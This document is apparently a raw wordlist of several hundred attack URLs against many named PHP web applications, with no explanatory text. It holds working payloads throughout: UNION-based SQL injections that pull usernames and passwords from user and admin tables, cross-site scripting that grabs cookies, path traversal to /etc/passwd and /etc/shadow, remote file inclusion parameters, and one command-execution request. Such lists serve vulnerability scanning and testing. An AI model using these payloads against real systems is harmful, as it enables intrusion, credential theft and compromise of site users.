/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10
/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
/scripts/evil.js></script>
/scripts/evil.js></script>
/1_0/admin/index.php?l=[XSS]
/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/* 
/ACGVnews/glossaire.php?id=[SQL]
/ACGVnews/glossaire.php?id="><script>alert(document.cookie)</script>
/ang/send_email.php?postid=[XSS]
/hive_v2.0_RC2/template/purpletech/base_include.php?page=../../etc/passwd 
/modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 
/bcoos/class/debug/highlight.php?file=../../../../../boot.ini 
/index.php?appservlang=">[XSS] http
/index.php?showtopic=18&st=&lt;/textarea&gt;<script>alert(/xss/)</script> http
/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,concat(CHAR(0x75,0x73,0x65,0x72,0x3A,0xD,0xA),username,0x3a,password),2,concat(database(),char(58),0x2020,version()),4+from+users/*
/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,concat(user(),0x3a,password),null,concat(database(),0x2020,version()),4+from+mysql.user/*
/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,load_file(0x6574632F706173737764),2,0,4+from+users/*
/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,load_file(CONCAT(CHAR(0x65),CHAR(0x74),CHAR(0x63),CHAR(0x2F),CHAR(0x70),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x77),CHAR(0x64))),2,0,4+from+users/*
/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(0x6574632F706173737764),50),2,0,4+from+users/*
/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/passwd),50),2,0,4+from+users/*
/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/shadow),50),2,0,4+from+users/* 
/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*
/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*
/[phpfreeforum_path]/html/error.php?message=&lt;XSS&gt;
/[phpfreeforum_path]/html/part/menu.php?nickname=<XSS>
/[phpfreeforum_path]/html/part/menu.php?randomid=<XSS> 
/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[home]=<XSS>
/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu]=<XSS>
/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[admin_menu_page_overview]=<XSS>
/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_username]=<XSS>
/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[login_password]=<XSS>
/[BBForum_path]/index.php?outpused=<XSS>
/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS> 
/search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>&#039;><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on
/SAFARI/montage/forgotPW.php?school="><script>alert(1)</script> http
/wp-uploadfile.php?f_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* 
/dzoic/index.php?handler=search&action=perform&search_type=members&fname=[Sql Injection]&lname=jakson&email=1@www.example2.com&handshakes=0&distance=0&country=0&state=0&city=0&postal_code=12345&online=on&with_photo=on&submit=Search 
/horde/kronolith/workweek.php?timestamp=<XSS> 
/horde/kronolith/week.php?timestamp=<XSS> 
/horde/kronolith/day.php?timestamp=<XSS> 
/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?errcontext=<XSS>
/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS> 
/ablespace/adv_cat.php?cat_id=[sql inection] 
/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth
/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah%
/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% 
/class/HomepageTop.php?teacher_id=-99'+union+select+0,1,teacher_password,teacher_account,4,5+from+teacher/*
/class/HomepageMain.php?teacher_id=-99'+union+select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/*
/class/MessageReply.php?teacher_id=1&message_id=-99'+union+select+teacher_account,teacher_password,3,4+from+teacher/*
/class/ApplyDB.php" method="post">
/news/news.php?mode=voir&nb=[XSS] 
/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss] 
/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20 
/WyMienphp1.0-RC2/WyMienphp/index.php?f=[XSS] 
/view.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook/* http
/index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6[XSS]&mode=edit 
/index.php?go=main.default&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
/index.php?go=main.default&orderBy=taskComplete&ascDesc=DESC&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
/education/components/docmgr/default.php?sectiondetailid=2179&fileitem=477&catfilter=XSS
/education/components/docmgr/default.php?sectiondetailid=#XSS
/education/components/scrapbook/default.php?sectiondetailid=#XSS
/education/district/district.php?sectiondetailid=#XSS
/education/admin/XSS
/education/components/XSS
/education/components/whatsnew/default.php?sectiondetailid=#XSS 
/path/search.php?search=[XSS] http
/detalle_noticia.php?id_noticia=[SQL] 
/calender_path/admin/add.php
/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid]
/vB3/admincp/index.php?redirect={XSS}
/vB3/admincp/index.php?redirect=data
/vB3/admincp/index.php?redirect=data
/path/snoteindex.php?RootID=[XSS]
/path/snoteindex.php?RootID=></a></td><script>alert(123)</script>
/path/snoteindex.php?RootID=1&SnoteID=[XSS]
/path/snoteindex.php?RootID=1&SnoteID=></a></td><script>alert(123)</script>
/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS]
/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=></a></td><script>alert(123)</script>
/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS]
/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=></a></td><script>alert(123)</script>
/path/snoteform.php?RootID=[XSS]
/path/snoteform.php?RootID="></a></td><script>alert(123)</script>
/path/snoteform.php?RootID=1&SnoteID=[XSS]
/path/snoteform.php?RootID=1&SnoteID="></a></td><script>alert(123)</script>
/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS]
/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel="></a></td><script>alert(123)</script>
/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS]
/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat="></a></td><script>alert(123)</script>
/opendocman-1.2.5/out.php?last_message=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
/[path]/index.php?action=[SQL] 
/vB3/modcp/index.php?redirect=data
/vB3/modcp/index.php?redirect={XSS} 
/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* 
/path/template2.php?sitetitle=[XSS]
/path/template2.php?sitenav=[XSS]
/path/template2.php?sitemain=[XSS]
/path/template2.php?sitealt=[XSS] 
/path/administrator/admin.php?site_absolute_path=[SHELL]
/path/administrator/menu_operation.php?site_absolute_path=[SHELL]
/path/administrator/template_add.php?site_absolute_path=[SHELL]
/path/administrator/template_operation.php?site_absolute_path=[SHELL] 
/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- 
/path/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=[SHELL] 
/path/members.php?membername=[XSS]
/path/members.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E
/path/comments.php?membername=[XSS]
/path/comments.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E
/path/photos.php?membername=[XSS]
/path/photos.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E
/path/archive.php?membername=[XSS]
/path/archive.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E
/path/cat.php?membername=[XSS]
/path/cat.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E
/[benjacms_path]/admin/admin_edit_submenu.php/<XSS>
/[benjacms_path]/admin/admin_new_submenu.php/<XSS>
/[benjacms_path]/admin/admin_edit_topmenu.php/<XSS> 
/A_PHP_Scripts_News_Management_System_03/news/admin/system/include.php?skindir=[SHELL]
/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?skindir=[LFI]
/A_PHP_Scripts_News_Management_System_03/news/admin/login.php?skindir=[LFI]
/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?e=[XSS] 
/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
/out.php?linkid=50+and+1=1 (true)
/out.php?linkid=50+and+1=2 (false) 
/[trcms_path]/viewarticle.php/<XSS>
/[trcms_path]/viewarticle.php?id=<XSS>
/[trcms_path]/viewarticle2.php?id=<XSS>
/[trcms_path]/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
/[trcms_path]/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
/polypager/?[Web Page]&nr=[XSS] 
/admin/fonctions/supprimer_flux.php?IdFlux=[SQL injection]
/admin/fonctions/supprimer_tag.php?IdTag=[SQL injection]
/admin/fonctions/supprimer_flux.php?IdFlux=5
/admin/fonctions/modifier_tps_rafraich.php?TpsRafraich=500 
/[FANAME-DIRECTORY]/index.php?key="><script>alert(document.cookies)</script> http
/[FANAME-DIRECTORY]/page.php?name=<script>alert(document.cookies)</script>
/index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**
/index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users-- 
/path/dodosmail.php?dodosmail_header_file=/../../../etc/passwd 
/demo/search.php?_action=search&_off=[EvilScript]
/modules.php?name=4ndvddb&rop=show_dvd&id=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 
//http
//http
//http
//http
//http
//http
//http
//http
//http
//http
//http
/index.php?op=tellafriend&current_url=">/><script>alert(/xssed/)</script>
/cms/index.php?site=account&goodmsg=>">/><script>alert(/xs/)</script>
/cms/index.php?site=filemanager&msg=>">/><script>alert(/xs/)</script>
/cms/index.php?site=filemanager&dir=>">/><script>alert(/xs/)</script>
/cms/index.php?site=usermanager&option=show&id=>">/><script>alert(/xs/)</script>
/cms/login.php?previous_page=/cms/index.php?msg=">/><script>alert(/xs/)</script>
/cms/login.php?previous_page=/cms/index.php?goodmsg=">/><script>alert(/xs/)</script>
/path/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]=http
/path/includes/pear/Net/Socket.php?CONFIG[pear_dir]=http
/path/includes/pear/XML/Parser.php?CONFIG[pear_dir]=http
/path/includes/pear/XML/Tree.php?CONFIG[pear_dir]=http
/path/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]=http
/path/includes/pear/Console/Getopt.php?CONFIG[pear_dir]=http
/path/includes/pear/System.php?CONFIG[pear_dir]=http
/path/includes/pear/Log.php?CONFIG[pear_dir]=http
/path/includes/pear/File.php?CONFIG[pear_dir]=http
/path/includes/prepend.php?CONFIG[pear_dir]=http
/path/includes/cachedConfig.php?CONFIG[pear_dir]=http
/path/includes/prepend.php?CONFIG[includes]=http
/path/includes/email.list.search.php?CONFIG[includes]=http
/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>&register="><script>alert(12157312.477)</script> 
/hudson/search/?q="><script>alert(1);</script> 
/wp/wp-admin/press-this.php/?ajax=video&amp;s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/wp/wp-admin/press-this.php/?ajax=thickbox&amp;i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/path/ecms/eprint.php?DOCUMENT_ROOT=shell.txt?
/path/ecms/index.php?DOCUMENT_ROOT=shell.txt? 
/path/search_wA.php?LIBPATH=[Evil] 
/claroline/announcements/announcements.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/calendar/agenda.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/course/index.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/course_description/index.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/document/document.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/exercise/exercise.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/group/group_space.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/phpbb/newtopic.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/phpbb/reply.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/phpbb/viewtopic.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/wiki/wiki.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/claroline/work/work.php?"><script>alert(&#039;DSecRGXSS&#039;)</script>
/[installdir]/claroline/redirector.php?url=http
/ibs/admin/index.php?username=<script>alert(document.cookie)</script>&password=a&B1=Submit
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http
/lemon_includes/FCKeditor/editor/filemanager/browser/browser.php?dir=../../../../../../../../../../etc/passwd 
/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--
/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user-- 
/path/demo/demo21_with_hardcoded_urls.php/>'><ScRiPt>alert(document.cookie)</ScRiPt> 
/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/config/mysqlconnection.inc
/config/mysqlconnection%20-%20Copy.inc
/admin/setup.php
/config/settings.inc 
/config.php?incpath=[SHELL] 
/lab/phpkf/yonetim/forum_duzen.php?kip=forum_duzenle&fno='+union+select+kullanici_adi,concat(database(),0x3a,version()),sifre+from+phpkf_kullanicilar/* 
/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00
/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script> 
/modules/newbb_plus/votepolls.php?bbPath[path]=http
/modules/newbb_plus/config.php?bbPath[root_theme]=http
/visualpic/?login&pic=>"><script>alert("XSS")</script>
/visualpic/?pic=%00'"><script>alert("XSS")</script>
/visualpic/?login&pic=>"><script>alert("XSS")</script> 
/[installdir]/claroline/calendar/myagenda.php?"><script>alert(&#039;DSecRG
/[installdir]/claroline/user/user.php?"><script>alert(&#039;DSecRG
/[installdir]/claroline/tracking/courseLog.php?view=DSec"
/[installdir]/claroline/tracking/toolaccess_details.php?toolId="><script>alert(&#039;DSecRG
/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user 
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http
/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin-- 
/Owl/register.php?myaction=getpasswd&username="><script>alert(1);</script> 
/rss2.php?premodDir=[EVIL]
/rss2.php?pathToFiles=[EVIL] 
/?[script]alert('XSS')[/script] 
/guestbook.js.php?link=[XSS] 
/?session=">><>><script>alert(document.cookie)</script> <html> <head></head> <body onLoad=javascript
/hot/gizli.php?cfgProgDir=cmd.txt? 
/index.php?letter=[XSS] 
/path/?acuparam=>"><ScRiPt>alert(111)</ScRiPt> http
/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,pwd+from+nuke_authors
/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,aid+from+nuke_authors
/result.php?r=c%253E%255BHWtZYeidnW%257BdH%253A1MnOwcR%253E%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Ebtl%253CTB%253C67%253C2% 253C2%253C498984%253Ctuzmf2%256067%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25602%2560e3s%2560efsq%253Cksfct31%253Cksfct31%253C93454%253C43642%253Cbtl %253C%253C0e0tfbsdi0q0joufsdptnpt0ynm0epnbjomboefs0joum0e3s0gfg0qpqdbu0w30%253Cqbslfe%252Ftzoejdbujpo%252Fbtl%252Fdpn%2527jqvb%2560je%253E%253A%253A597&K eywords= 
/path/day.php?area=[XSS]
/path/week.php?area=[XSS]
/path/month.php?area=[XSS]
/path/search.php?area=[XSS]
/path/report.php?area=[XSS]
/path/help.php?area=[XSS] 
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00 
/data/inc/footer.php?lang_footer=[Cross Site Scripting]
/data/inc/header.php?pluck_version=[Cross Site Scripting]
/data/inc/header.php?lang_install22=[Cross Site Scripting]
/data/inc/header.php?titelkop=[Cross Site Scripting]
/data/inc/header.php?lang_kop1=[Cross Site Scripting]
/data/inc/header.php?lang_kop2=[Cross Site Scripting]
/data/inc/header.php?lang_modules=[Cross Site Scripting]
/data/inc/header.php?lang_kop4=[Cross Site Scripting]
/pluck/data/inc/header.php?lang_kop15=[Cross Site Scripting]
/data/inc/header.php?lang_kop5=[Cross Site Scripting]
/data/inc/header.php?titelkop=[Cross Site Scripting]
/data/inc/header2.php?pluck_version=[Cross Site Scripting]
/data/inc/header2.php?titelkop=[Cross Site Scripting]
/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting] 
/help/livehelp_js.php?department=<script>alert(1)</script>
/index.php?latest=[XSS]
/index.php?msg=[XSS]
/images.php?latest=[XSS]
/images.php?msg=[XSS]
/suggest_image.php?latest=[XSS]
/suggest_image.php?msg=[XSS]
/image_desc.php?latest=[XSS]
/image_desc.php?msg=[XSS]
/admin/adminhome.php?msg=[XSS]
/admin/config.php?msg=[XSS]
/admin/changepassword.php?msg=[XSS]
/admin/cleanup.php?msg=[XSS]
/admin/browsecats.php?msg=[XSS]
/s03.php?shopid=s03&cur=eur&sp=de&ag='[SQL] 
/path/index.php?module=[LFI]
/path/admin/index.php?module=[LFI] 
/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*
/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/* 
/path/baslik.php?tema_dizin=../%00LocalFile]
/path/anket_yonetim.php?portal_ayarlarportal_dili=../%00LocalFile] 
/path/admin/includes/themes/default/header.php?page_area=[XSS]
/path/admin/includes/themes/default/header.php?page_header=[XSS] 
/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=[Sh3LL]
/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL] 
/forum/profile.php?action=editprofile&id=[Your User ID]
/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al
/modules/kshop/kshop_search.php" method="POST"> <input type="text" name="search" value="Put your XSS Here !!!"> </form
/modules.php?name=Kleinanzeigen&a_op=visit&lid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
/modules.php?name=Kleinanzeigen&a_op=visit&lid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 
/[cms]/modules/rmms/search.php?itemsxpag=4"><script>alert(1)</script>&Submit=Go%21&idc=0"><script>alert(2)</script>&key="><script>alert(3)</script> 
/[cms]/htdocs/modules/yogurt/friends.php?uid=1"><script>alert(1)</script>
/[cms]/htdocs/modules/yogurt/seutubo.php?uid=1"><script>alert(1)</script>
/[cms]/htdocs/modules/yogurt/album.php?uid=1"><script>alert(1)</script>
/[cms]/htdocs/modules/yogurt/scrapbook.php?uid=1"><script>alert(1)</script>
/[cms]/htdocs/modules/yogurt/index.php?uid=1"><script>alert(1)</script>
/[cms]/htdocs/modules/yogurt/tribes.php?uid=1"><script>alert(1)</script>
/modules/rmdp/search.php?key=">[XSS-code]&cat=0
/modules/rmdp/down.php?id=1">[XSS-code]
/modules/rmdp/down.php?com_mode=nest&com_order=1&id=1">[XSS-code]&cid=3#users 
/links.php?_SERVER[DOCUMENT_ROOT]=http
/links.inc.php?_SERVER[DOCUMENT_ROOT]=http
/index.php?task=comments&s=>?><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt> 
/visitor/index.php?_m=livesupport&_a=startclientchat&sessionid="%20onload%3dalert(document.cookie)%20style=%3d
/index.php?_m=news&_a=view&filter=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Ca%20href=%22
/staff/index.php?_m=tickets&_a=ticketactions&action=delcflink&ticketid=1&customfieldlinkid=-99&#039;UNION SELECT IF(SUBSTRING(password,1, 1) = CHAR(50), BENCHMARK(1000000,MD5(CHAR(1))), null),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROMss_staff WHERE staffid=1/*
/admin/bin/patch.php?INSTALL_FOLDER=[Evilc0dE] 
/search.php?q="><script>alert("XSS")</script> 
/index.php?catid=[XSS]
/index.php?page=user_add&catid=[XSS]
/index.php?page=recip&catid=[XSS]
/index.php?page=tellafriend&catid=[XSS]
/index.php?page=contact&catid=[XSS]
/index.php?page=tellafriend&id=[XSS] 
/cms/meetweb/classes/modules.php?root_path=[SHell]
/cms/meetweb/classes/ManagerResource.class.php?root_path=[SHell]
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=[SHell]
/cms/meetweb/classes/RegForm.class.php?root_path=[SHell]
/cms/meetweb/classes/RegResource.class.php?root_path=[SHell]
/cms/meetweb/classes/RegRightsResource.class.php?root_path=[SHell] 
/[installdir]/admin/create_order_new.php=http
/[installdir]/admin/search_links.php"<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>
/path/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin--
/path/dpage.php?docID=-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin-- 
/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/* 
/include/class_yapbbcooker.php?cfgIncludeDirectory=http
/path/modules.php?module=[XSS] 
/path/admin_modules.php?module=[LFI]
/path/modules.php?module=[LFI]
/phpizabi/index.php?L=admin.templates.edittemplate&id=../../../boot.ini 
/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>
/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=<script>alert(&#039;xss&#039;)</script>
/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script> 
/view_product.php?cat_id=6500&sub_cat=6508&product_id=-9999+union+all+select+1,concat(user_name,char(58),password),null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user--
/view_product.php?cat_id=155&sub_cat=-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user-- 
/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00
/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00
/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00
/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00
/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00
/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00 
/[path]/index.php?tg=search&pat=abcdefgh&idx=find&navpos=0&navitem=&field=<script>alert(333.45)</script> 
/vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--
/vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--
/vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--
/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--
/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--
/ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--
/ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--
/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin-- 
/people.php?PostBackAction=Apply&NewPassword='"><script>alert document.cookie)%3B<%2Fscript>
/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- 
/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- 
/index.php?page=8&id=95+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+from+users/* 
/farver/index.php?c=/../../../../../../../../boot.ini%00 
/interface/Login.php?user_name=admin&password=XSS
/interface/Login.php?user_name=XSS 
/courier/forgot_password.html/>"><script>alert(document.cookie)</script> 
/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/* 
/webboard/admindel.php?action=delete&mode=question&qno=[NUM]&ano=[NUM] 
/modules/popnupblog/index.php?param=1">[XSS-CODE]&start=0,10&cat_id=&view=1 http
/message.php?<script><script>alert('xss')</script></script> 2nd vector) https
/dir(s)/admin/login.php?msg=[XSS] 
/adv_cat.php?find_str="><script>alert('1')</script>&cat_id=1&razd_id=&x=0&y=0 
/index.php?m=tasks&inactive=toggle"> http
/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script> 
/path/buscarCat.php?palBuscar=[XSS] 
